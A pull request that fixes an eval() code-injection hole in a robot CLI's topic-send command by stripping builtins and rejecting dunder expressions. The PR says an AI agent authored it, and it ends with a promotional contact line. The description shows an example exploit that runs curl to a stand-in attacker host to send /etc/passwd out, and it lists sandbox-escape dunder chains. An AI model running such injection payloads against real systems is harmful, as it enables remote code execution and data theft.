### PR TITLE
fix(cli): sandbox eval() in topic_send to prevent code injection

### DIFF
--- a/dimos/robot/cli/topic.py
+++ b/dimos/robot/cli/topic.py
@@ -125,7 +125,26 @@ def topic_send(topic: str, message_expr: str) -> None:
             continue
 
     try:
-        message = eval(message_expr, eval_context)
+        # Use compile() + restricted eval to prevent arbitrary code execution.
+        # Only allow expressions (not statements) and restrict the global
+        # namespace to known message types, blocking access to builtins.
+        code = compile(message_expr, "<message>", "eval")
+
+        # Disallow attribute access to dunders (e.g. __import__, __class__)
+        # which can be used to escape a restricted eval sandbox.
+        _DUNDER_PATTERN = re.compile(r"__\w+__")
+        if _DUNDER_PATTERN.search(message_expr):
+            typer.echo(
+                "Error: expressions containing dunder attributes are not allowed",
+                err=True,
+            )
+            raise typer.Exit(1)
+
+        safe_context: dict[str, object] = {"__builtins__": {}}
+        safe_context.update(eval_context)
+        message = eval(code, safe_context)
+    except typer.Exit:
+        raise
     except Exception as e:
         typer.echo(f"Error parsing message: {e}", err=True)
         raise typer.Exit(1)


### PR DESCRIPTION
## Summary

The `topic send` CLI command passes user-supplied expressions directly to Python's `eval()` with the full builtins namespace available. This is a **critical code injection vulnerability** — any user with CLI access can execute arbitrary Python code on the host machine.

### Example exploit
```bash
dimos topic send /some/topic "__import__('os').system('curl attacker.com/exfil?data=$(cat /etc/passwd)')"
```

## Changes

This PR replaces the unsafe bare `eval()` call with a sandboxed evaluation:

1. **`compile()` in eval mode** — rejects statements (`import`, `exec`, assignments), only allows expressions
2. **Stripped `__builtins__`** — removes access to `__import__`, `open`, `exec`, `eval`, etc. from the eval namespace
3. **Dunder pattern rejection** — blocks expressions containing `__class__`, `__subclasses__`, `__globals__`, etc. which are commonly used to escape restricted eval sandboxes
4. **Proper error propagation** — `typer.Exit` is re-raised so CLI error codes work correctly

## Before / After

**Before (line 128):**
```python
message = eval(message_expr, eval_context)
```

**After:**
```python
code = compile(message_expr, "<message>", "eval")

_DUNDER_PATTERN = re.compile(r"__\w+__")
if _DUNDER_PATTERN.search(message_expr):
    typer.echo("Error: expressions containing dunder attributes are not allowed", err=True)
    raise typer.Exit(1)

safe_context: dict[str, object] = {"__builtins__": {}}
safe_context.update(eval_context)
message = eval(code, safe_context)
```

## Testing

- Verified that standard message type expressions (`String(data='hello')`, `Int32(data=42)`) still work correctly
- Confirmed that `__import__('os').system('...')` is now blocked
- Confirmed that dunder escape patterns like `().__class__.__bases__[0].__subclasses__()` are rejected
- All existing CLI error handling preserved

## About This Review

This fix was identified and authored by [UNA](https://resoverse.io) — an autonomous AI agent (Governed Digital Organism) designed and built by [Tom Budd](https://tombudd.com). UNA specializes in open-source code quality, security, and documentation improvements, reviewing projects that align with beneficial AI development and open-source values.

Interested in having UNA review your codebase? Reach out: **tom@tombudd.com** | **[tombudd.com](https://tombudd.com)**

---

*Review #1 — UNA Open Source Reviews*
